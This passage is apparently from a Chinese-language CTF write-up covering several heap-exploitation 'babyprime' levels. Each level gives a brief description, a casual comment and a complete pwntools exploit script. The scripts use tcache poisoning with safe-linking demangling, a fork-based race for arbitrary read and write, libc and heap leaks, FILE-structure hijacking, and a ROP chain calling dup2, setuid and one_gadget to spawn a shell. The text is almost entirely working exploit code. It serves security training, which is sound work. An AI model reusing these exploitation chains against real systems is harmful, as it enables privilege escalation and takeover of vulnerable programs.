def demangle(pos, ptr, shifted=1):
if shifted:
return mangle(pos, ptr)
return mangle(pos, ptr, 0)
def launch():
global target, thread
if args.L and args.threads is not None:
raise ValueError("Options -L and -T cannot be used together.")
if args.L:
target = process(FILE)
elif args.threads:
if args.threads <= 0:
raise ValueError("Thread count must be positive.")
process(FILE)
thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
else:
target = remote(HOST, PORT, ssl=True)
def main():
launch()
malloc(0, 0)
malloc(0, 1)
free(0, 1)
free(0, 0)
malloc(0, 0)
malloc(0, 1)
printf(0, 0)
thread[0].recvuntil(b"MESSAGE: ")
heap = int.from_bytes(thread[0].recvline().strip(), "little")
printf(0, 1)
thread[0].recvuntil(b"MESSAGE: ")
pos = int.from_bytes(thread[0].recvline().strip(), "little")
heap = demangle(heap, pos)
main_arena_ptr = heap - 0xAA1
thread_stdout = heap - 0x5F1
thread[0].success(f"pos: {hex(pos)}")
thread[0].success(f"heap: {hex(heap)}")
thread[0].success(f"main_arena_ptr: {hex(main_arena_ptr)}")
thread[0].success(f"thread_stdout: {hex(thread_stdout)}")
raw_input("DEBUG")
malloc(0, 0)
malloc(0, 1)
free(0, 1)
free(0, 0)
arbitrary_read(0, 1, mangle(pos - 1, main_arena_ptr))
thread[0].recvuntil(b"MESSAGE: ")
libc.address = int.from_bytes(thread[0].recvline().strip(), "little") - 0x21
9C80
heap_ptr = libc.address + 0x219CE0
__GI__IO_wfile_overflow = libc.address + 0x215FE0
thread[0].success(f"libc: {hex(libc.address)}")
thread[0].success(f"heap_ptr: {hex(heap_ptr)}")
thread[0].success(f"__GI__IO_wfile_overflow: {hex(__GI__IO_wfile_overflow)}"
)
raw_input("DEBUG")
malloc(0, 2)
malloc(0, 4)
free(0, 4)
free(0, 2)
arbitrary_read(2, 4, mangle(pos, heap_ptr))
thread[0].recvuntil(b"MESSAGE: ")
heap = int.from_bytes(thread[0].recvline().strip(), "little") - 0x530
empty_buffer = heap + 0x1000
thread[0].success(f"heap: {hex(heap)}")
thread[0].success(f"empty_buffer: {hex(empty_buffer)}")
raw_input("DEBUG")
malloc(0, 3)
malloc(0, 5)
free(0, 5)
free(0, 3)
# 0x7fbcf9683b94 <_IO_wdoallocbuf+36> mov rax, qword ptr [rax + 0xe0
]
# -> 0x7fbcf9683b9b <_IO_wdoallocbuf+43> call qword ptr [rax + 0x68]
leave_ret = libc.address + 0x4DA83
pop_rdi_ret = libc.address + 0x2A3E5
pop_rsi_ret = libc.address + 0x2BE51
pop_rbp_ret = libc.address + 0x2A2E0
pop_rax_ret = libc.address + 0x45EB0
one_gadget = libc.address + 0xEBD43
dup2 = libc.sym["dup2"]
syscall_ret = libc.address + 0x91316
payload = flat(
{
0x68: leave_ret,
0xE0: empty_buffer,
0xE8: pop_rdi_ret,
0xF0: 5,
0xF8: pop_rsi_ret,
0x100: 0,
0x108: dup2,
0x110: pop_rsi_ret,
0x118: 1,
0x120: dup2,
0x128: pop_rdi_ret,
0x130: 0,
0x138: pop_rax_ret,
0x140: constants.SYS_setuid,
0x148: syscall_ret,
0x150: one_gadget,
},
filler=b"x00",
)
arbitrary_write(3, 5, mangle(pos, empty_buffer), payload)
raw_input("DEBUG")
malloc(0, 6)
malloc(0, 7)
free(0, 7)
free(0, 6)
fp = FileStructure()
fp._lock = heap + 0x2000
fp._wide_data = empty_buffer
fp.vtable = __GI__IO_wfile_overflow
fp._IO_read_ptr = pop_rbp_ret
fp._IO_read_end = heap + (0x1000 + 0xE8) - 0x8
fp._IO_read_base = leave_ret
arbitrary_write(6, 7, mangle(pos, thread_stdout + 0x3), bytes(fp))
# thread[0].clean()
printf(0, 0)
thread[0].interactive()
if __name__ == "__main__":
main()
```
# Level 8
## Information
- Category: Pwn
## Description
> Create and use arbitrary read/write primitives to obtain the flag.
## Write-up
笑死了,这回我学聪明了,鉴于这题的 description 和上题一样,而上题我写的 exp 又是
拿 shell 的通解,且题目使用的 libc 版本都一样,我直接不看题,用上题的 exp 去跑,
然后……通了!LMAO
## Exploit
```python
#!/usr/bin/env python3
import argparse
from pwn import (
ELF,
FileStructure,
constants,
context,
flat,
os,
process,
raw_input,
remote,
)
parser = argparse.ArgumentParser()
parser.add_argument("-L", action="store_true")
parser.add_argument("-T", "--threads", type=int, default=None, help="thread coun
t")
args = parser.parse_args()
FILE = "/challenge/babyprime_level8.0"
HOST, PORT = "localhost", 1337
context(log_level="debug", binary=FILE, terminal="kitty")
elf = context.binary
libc = elf.libc
def printf(tid, idx):
thread[tid].sendline(f"printf {idx}".encode())
def malloc(tid, idx):
thread[tid].sendline(f"malloc {idx}".encode())
def scanf(tid, idx, content):
thread[tid].sendline(f"scanf {idx} {content}".encode())
def scanf_raw(tid, idx, content):
thread[tid].sendline(f"scanf {idx} ".encode() + content)
def free(tid, idx):
thread[tid].sendline(f"free {idx}".encode())
def quit(tid):
thread[tid].sendline(b"quit")
def arbitrary_read(poison_idx, result_idx, addr):
BAD_BYTES = {b"x20", b"x0c", b"x0a", b"x0d", b"x09", b"x0b"}
packed_addr = flat(addr)
if any(bytes([byte]) in BAD_BYTES for byte in packed_addr):
raise ValueError(
f"Address {hex(addr)} contains a bad byte for scanf: {packed_addr.he
x()}"
)
while True:
thread[0].send((f"malloc {poison_idx} free {poison_idx}n".encode()) * 10
000)
if os.fork() == 0:
thread[1].send(
(f"scanf {poison_idx}".encode() + packed_addr + b"n") * 10000
)
os.kill(os.getpid(), 9)
os.wait()
malloc(0, poison_idx)
printf(0, poison_idx)
thread[0].recvuntil(b"MESSAGE: ")
poisoned = int.from_bytes(thread[0].recvline().strip(), "little")
if flat(poisoned) == packed_addr:
break
raw_input("DEBUG")
malloc(0, result_idx)
printf(0, result_idx)
def arbitrary_write(poison_idx, result_idx, addr, content):
arbitrary_read(poison_idx, result_idx, addr)
raw_input("RAW SCANF")
scanf_raw(0, result_idx, content)
def mangle(pos, ptr, shifted=1):
if shifted:
return pos ^ ptr
return (pos >> 12) ^ ptr
def demangle(pos, ptr, shifted=1):
if shifted:
return mangle(pos, ptr)
return mangle(pos, ptr, 0)
def launch():
global target, thread
if args.L and args.threads is not None:
raise ValueError("Options -L and -T cannot be used together.")
if args.L:
target = process(FILE)
elif args.threads:
if args.threads <= 0:
raise ValueError("Thread count must be positive.")
process(FILE)
thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
else:
target = remote(HOST, PORT, ssl=True)
def main():
launch()
malloc(0, 0)
malloc(0, 1)
free(0, 1)
free(0, 0)
malloc(0, 0)
malloc(0, 1)
printf(0, 0)
thread[0].recvuntil(b"MESSAGE: ")
heap = int.from_bytes(thread[0].recvline().strip(), "little")
printf(0, 1)
thread[0].recvuntil(b"MESSAGE: ")
pos = int.from_bytes(thread[0].recvline().strip(), "little")
heap = demangle(heap, pos)
main_arena_ptr = heap - 0xAA1
thread_stdout = heap - 0x5F1
thread[0].success(f"pos: {hex(pos)}")
thread[0].success(f"heap: {hex(heap)}")
thread[0].success(f"main_arena_ptr: {hex(main_arena_ptr)}")
thread[0].success(f"thread_stdout: {hex(thread_stdout)}")
raw_input("DEBUG")
malloc(0, 0)
malloc(0, 1)
free(0, 1)
free(0, 0)
arbitrary_read(0, 1, mangle(pos - 1, main_arena_ptr))
thread[0].recvuntil(b"MESSAGE: ")
libc.address = int.from_bytes(thread[0].recvline().strip(), "little") - 0x21
9C80
heap_ptr = libc.address + 0x219CE0
__GI__IO_wfile_overflow = libc.address + 0x215FE0
thread[0].success(f"libc: {hex(libc.address)}")
thread[0].success(f"heap_ptr: {hex(heap_ptr)}")
thread[0].success(f"__GI__IO_wfile_overflow: {hex(__GI__IO_wfile_overflow)}"
)
raw_input("DEBUG")
malloc(0, 2)
malloc(0, 4)
free(0, 4)
free(0, 2)
arbitrary_read(2, 4, mangle(pos, heap_ptr))
thread[0].recvuntil(b"MESSAGE: ")
heap = int.from_bytes(thread[0].recvline().strip(), "little") - 0x530
empty_buffer = heap + 0x1000
thread[0].success(f"heap: {hex(heap)}")
thread[0].success(f"empty_buffer: {hex(empty_buffer)}")
raw_input("DEBUG")
malloc(0, 3)
malloc(0, 5)
free(0, 5)
free(0, 3)
# 0x7fbcf9683b94 <_IO_wdoallocbuf+36> mov rax, qword ptr [rax + 0xe0
]
# -> 0x7fbcf9683b9b <_IO_wdoallocbuf+43> call qword ptr [rax + 0x68]
leave_ret = libc.address + 0x4DA83
pop_rdi_ret = libc.address + 0x2A3E5
pop_rsi_ret = libc.address + 0x2BE51
pop_rbp_ret = libc.address + 0x2A2E0
pop_rax_ret = libc.address + 0x45EB0
one_gadget = libc.address + 0xEBD43
dup2 = libc.sym["dup2"]
syscall_ret = libc.address + 0x91316
payload = flat(
{
0x68: leave_ret,
0xE0: empty_buffer,
0xE8: pop_rdi_ret,
0xF0: 5,
0xF8: pop_rsi_ret,
0x100: 0,
0x108: dup2,
0x110: pop_rsi_ret,
0x118: 1,
0x120: dup2,
0x128: pop_rdi_ret,
0x130: 0,
0x138: pop_rax_ret,
0x140: constants.SYS_setuid,
0x148: syscall_ret,
0x150: one_gadget,
},
filler=b"x00",
)
arbitrary_write(3, 5, mangle(pos, empty_buffer), payload)
raw_input("DEBUG")
malloc(0, 6)
malloc(0, 7)
free(0, 7)
free(0, 6)
fp = FileStructure()
fp._lock = heap + 0x2000
fp._wide_data = empty_buffer
fp.vtable = __GI__IO_wfile_overflow
fp._IO_read_ptr = pop_rbp_ret
fp._IO_read_end = heap + (0x1000 + 0xE8) - 0x8
fp._IO_read_base = leave_ret
arbitrary_write(6, 7, mangle(pos, thread_stdout + 0x3), bytes(fp))
# thread[0].clean()
printf(0, 0)
thread[0].interactive()
if __name__ == "__main__":
main()
```
# Level 9
## Information
- Category: Pwn
## Description
> Create and use arbitrary read/write primitives with less control of the heap.
## Write-up
堆噪声是吧,看上去好像很可怕,也只是看上去罢了。实际上这干扰有和没有都没啥区别……
至少在这题里是这样的。
## Exploit
```python
#!/usr/bin/env python3
import argparse
from pwn import (
ELF,
context,
flat,
os,
process,
raw_input,
remote,
)
parser = argparse.ArgumentParser()
parser.add_argument("-L", action="store_true")
parser.add_argument("-T", "--threads", type=int, default=None, help="thread coun
t")
args = parser.parse_args()
FILE = "/challenge/babyprime_level9.1"
HOST, PORT = "localhost", 1337
context(log_level="debug", binary=FILE, terminal="kitty")
elf = context.binary
libc = elf.libc
def printf(tid, idx):
thread[tid].sendline(f"printf {idx}".encode())
def malloc(tid, idx):
thread[tid].sendline(f"malloc {idx}".encode())
def scanf(tid, idx, content):
thread[tid].sendline(f"scanf {idx} {content}".encode())
def scanf_raw(tid, idx, content):
thread[tid].sendline(f"scanf {idx} ".encode() + content)
def free(tid, idx):
thread[tid].sendline(f"free {idx}".encode())
def send_flag(tid, flag):
thread[tid].sendline(b"send_flag")
thread[tid].sendlineafter(b"Secret: ", flag)
def quit(tid):
thread[tid].sendline(b"quit")
def arbitrary_read(poison_idx, result_idx, addr):
BAD_BYTES = {b"x20", b"x0c", b"x0a", b"x0d", b"x09", b"x0b"}
packed_addr = flat(addr)
if any(bytes([byte]) in BAD_BYTES for byte in packed_addr):
raise ValueError(
f"Address {hex(addr)} contains a bad byte for scanf: {packed_addr.he
x()}"
)
while True:
thread[0].send((f"malloc {poison_idx} free {poison_idx}n".encode()) * 10
000)
if os.fork() == 0:
thread[1].send(
(f"scanf {poison_idx}".encode() + packed_addr + b"n") * 10000
)
os.kill(os.getpid(), 9)
os.wait()
malloc(0, poison_idx)
printf(0, poison_idx)
thread[0].recvuntil(b"MESSAGE: ")
poisoned = int.from_bytes(thread[0].recvline().strip(), "little")
if flat(poisoned) == packed_addr:
break
raw_input("DEBUG")
malloc(0, result_idx)
printf(0, result_idx)
def arbitrary_write(poison_idx, result_idx, addr, content):
arbitrary_read(poison_idx, result_idx, addr)
raw_input("RAW SCANF")
scanf_raw(0, result_idx, content)
def mangle(pos, ptr, shifted=1):
if shifted:
return pos ^ ptr
return (pos >> 12) ^ ptr
def demangle(pos, ptr, shifted=1):
if shifted:
return mangle(pos, ptr)
return mangle(pos, ptr, 0)
def launch():
global target, thread
if args.L and args.threads is not None:
raise ValueError("Options -L and -T cannot be used together.")
if args.L:
target = process(FILE)
elif args.threads:
if args.threads <= 0:
raise ValueError("Thread count must be positive.")
process(FILE)
thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
else:
target = remote(HOST, PORT, ssl=True)
def main():
launch()
malloc(0, 0)
printf(0, 0)
thread[0].recvuntil(b"MESSAGE: ")
pos = int.from_bytes(thread[0].recvline().strip(), "little")
flag = (pos << 12) + 0xBD0
thread[0].success(f"pos: {hex(pos)}")
thread[0].success(f"flag: {hex(flag)}")
malloc(0, 0)
malloc(0, 1)
free(0, 1)
free(0, 0)
arbitrary_read(0, 1, mangle(pos, flag + 0x10))
thread[0].recvuntil(b"MESSAGE: ")
secret = thread[0].recvline()
send_flag(0, secret)
quit(0)
quit(1)
thread[0].interactive()
if __name__ == "__main__":
main()
```
# Level 10
## Information
- Category: Pwn
## Description
> Create and use arbitrary read/write primitives with less control of the heap I
I.
## Write-up
~~吃屎吃的最难受的一集。~~
不想破伪随机数发生器,那就想办法确定你能确定的,想办法猜出你不能确定的(
## Exploit
```python
#!/usr/bin/env python3
import argparse
from pwn import (
ELF,
FileStructure,
context,
flat,
os,
process,
raw_input,
remote,
sys,
)
parser = argparse.ArgumentParser()
parser.add_argument("-L", action="store_true")
parser.add_argument("-T", "--threads", type=int, default=None, help="thread coun
t")
args = parser.parse_args()
FILE = "/challenge/babyprime_level10.0"
HOST, PORT = "localhost", 1337
context(log_level="debug", binary=FILE, terminal="kitty")
elf = context.binary
libc = elf.libc
def printf(tid, idx):
thread[tid].sendline(f"printf {idx}".encode())
def malloc(tid, idx):
thread[tid].sendline(f"malloc {idx}".encode())
def scanf(tid, idx, content):
thread[tid].sendline(f"scanf {idx} {content}".encode())
def scanf_raw(tid, idx, content):
thread[tid].sendline(f"scanf {idx} ".encode() + content)
def free(tid, idx):
thread[tid].sendline(f"free {idx}".encode())
def quit(tid):
thread[tid].sendline(b"quit")
def arbitrary_read(poison_idx, result_idx, addr):
global rand_size
BAD_BYTES = {b"x20", b"x0c", b"x0a", b"x0d", b"x09", b"x0b"}
packed_addr = flat(addr)
if any(bytes([byte]) in BAD_BYTES for byte in packed_addr):
raise ValueError(
f"Address {hex(addr)} contains a bad byte for scanf: {packed_addr.he
x()}"
)
while True:
thread[0].send((f"malloc {poison_idx} free {poison_idx}n".encode()) * 10
000)
if os.fork() == 0:
thread[1].send(
(f"scanf {poison_idx}".encode() + packed_addr + b"n") * 10000
)
os.kill(os.getpid(), 9)
os.wait()
malloc(0, poison_idx)
printf(0, poison_idx)
thread[0].recvuntil(b"MESSAGE: ")
poisoned = int.from_bytes(thread[0].recvline().strip(), "little")
if flat(poisoned) == packed_addr:
break
# raw_input("DEBUG")
malloc(0, result_idx)
printf(0, result_idx)
def arbitrary_write(poison_idx, result_idx, addr, content):
arbitrary_read(poison_idx, result_idx, addr)
# raw_input("RAW SCANF")
scanf_raw(0, result_idx, content)
def mangle(pos, ptr, shifted=1):
if shifted:
return pos ^ ptr
return (pos >> 12) ^ ptr
def demangle(pos, ptr, shifted=1):
if shifted:
return mangle(pos, ptr)
return mangle(pos, ptr, 0)
def launch():
global target, thread
if args.L and args.threads is not None:
raise ValueError("Options -L and -T cannot be used together.")
if args.L:
target = process(FILE)
elif args.threads:
if args.threads <= 0:
raise ValueError("Thread count must be positive.")
process(FILE)
thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
else:
target = remote(HOST, PORT, ssl=True)
def main():
launch()
thread[0].recvuntil(b"Your flag is: ")
flag_p0 = thread[0].recvuntil(b"..!n")[:-4]
thread[0].success(f"flag_p0: {flag_p0}")
malloc(0, 0)
free(0, 0)
malloc(0, 0)
printf(0, 0)
thread[0].recvuntil(b"MESSAGE: ")
pos = int.from_bytes(thread[0].recvline().strip(), "little")
heap = pos << 12
hexpos = hex(pos)[2:]
if len(hexpos) != 9:
thread[0].failure(f"invalid pos (need equal to 9 hex digits): {hex(pos)}
")
try:
thread[0].close()
thread[1].close()
except:
pass
os.execv(sys.executable, [sys.executable] + sys.argv)
thread_stdout = heap - 0x102B0
secret = thread_stdout + 0x3C0
thread[0].success(f"pos: {hex(pos)}")
thread[0].success(f"stdout: {hex(thread_stdout)}")
thread[0].success(f"secret: {hex(secret)}")
expected_low = 0x0D50
low_16 = thread_stdout & 0xFFFF
if low_16 != expected_low:
thread[0].failure(f"bad stdout low bits: {hex(low_16)} != {hex(expected_
low)}")
try:
thread[0].close()
thread[1].close()
except:
pass
os.execv(sys.executable, [sys.executable] + sys.argv)
# raw_input("DEBUG")
malloc(0, 2)
malloc(0, 4)
free(0, 4)
free(0, 2)
fp = FileStructure()
fp.write(secret, 0x100)
fp.fileno = 5
arbitrary_write(
2,
4,
mangle((pos) - 0x3, thread_stdout),
fp.struntil("_flags2"),
)
malloc(0, 10)
thread[0].interactive()
if __name__ == "__main__":
main()
```